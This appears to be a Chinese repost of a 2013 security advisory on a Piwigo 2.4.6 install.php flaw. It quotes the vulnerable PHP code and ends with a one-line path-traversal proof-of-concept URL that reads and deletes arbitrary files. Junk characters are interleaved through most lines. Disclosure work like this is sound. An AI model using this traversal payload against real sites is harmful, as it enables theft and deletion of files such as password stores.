Piwigo是用PHP编写的相册脚本。5 F' D- S0 b1 d! `
; c/ ]1 x4 H. u( }* X# @3 WPiwigo 2.4.6及其他版本没有正确验证install.php脚本的 'dl'参数值,在实现上存在安全漏洞,攻击者可利用这些漏洞查看受影响计算机上的任意文件,删除受影响应用上下文内的任意文件。
" C ^& M5 {. V9 G9 H! f====================================================================
1 Y1 Q5 M* L3 a* K/install.php:8 n4 B, x3 w# W" T# N2 Y
-------------1 j* Z; c/ f7 a2 \! n, a
113: if (!empty($_GET['dl']) && file_exists(PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl']))
" Y3 Y8 o7 v( W. f/ g5 a5 X4 f2 @114: {
" A7 d# l( H9 D, U a115: $filename = PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl'];
1 i$ D. [1 ?: R1 _! m& `" [116: header('Cache-Control: no-cache, must-revalidate');8 Z. |; J: `4 y @, X
117: header('Pragma: no-cache');
& \5 `$ r( g: Z! }' G% W118: header('Content-Disposition: attachment; filename="database.inc.php"');
" j! L. U, d1 ]119: header('Content-Transfer-Encoding: binary');
! y H6 R7 U, X5 ]120: header('Content-Length: '.filesize($filename));
; |1 @ O6 V( f4 t( }2 k) Y( u: h121: echo file_get_contents($filename);& e$ l0 p% h% H9 [8 @) g7 N: k
122: unlink($filename);+ e9 \. O. E5 I2 G/ {
123: exit();: c; r' a( z, ?5 o- z0 ?
124: }: Q5 _, m* a2 \; r4 c2 f
====================================================================4 @$ } }% { b
' n% ~4 C- a0 N8 Q ~" n! ?3 |, v! }Tested on: Microsoft Windows 7 Ultimate SP1 (EN)% ~. d6 A3 O# T- O* G
Apache 2.4.2 (Win32)! g4 c" k5 W0 B) A. z" v/ x( V# I9 [5 D. V
PHP 5.4.4/ D4 b7 T; n! C
MySQL 5.5.25a
' x9 R# H: j' [ b 9 `5 {1 | E4 O' t
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
0 O7 [/ J& {% d/ X, G @zeroscience1 C0 j" |# U9 _" w; z' N
0 `, Z6 {4 [; X9 ~0 d& D! V9 X
Advisory ID: ZSL-2013-51277 z+ o) k7 s% T' x8 x9 c3 F) |1 h
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5127.php" b* F8 a+ u5 p/ {3 J
Vendor Patch: http://piwigo.org/bugs/view.php?id=28439 y9 F }; M' V. r
- `$ }/ j, I5 J15.02.2013
# ]3 T) {8 i1 x$ Z( F+ o/ H # E7 P* d1 B9 ]& Y. ~/ ?' ?0 G6 M2 N
--2 M m4 O$ Q- A
http://localhost/piwigo/install.php?dl=../../../../../../lio_passwords.txt
; t7 Q/ s5 Z4 N) ~) h" P6 Q# i8 X. ? ( Q3 f% B' R: \4 _0 \ F
|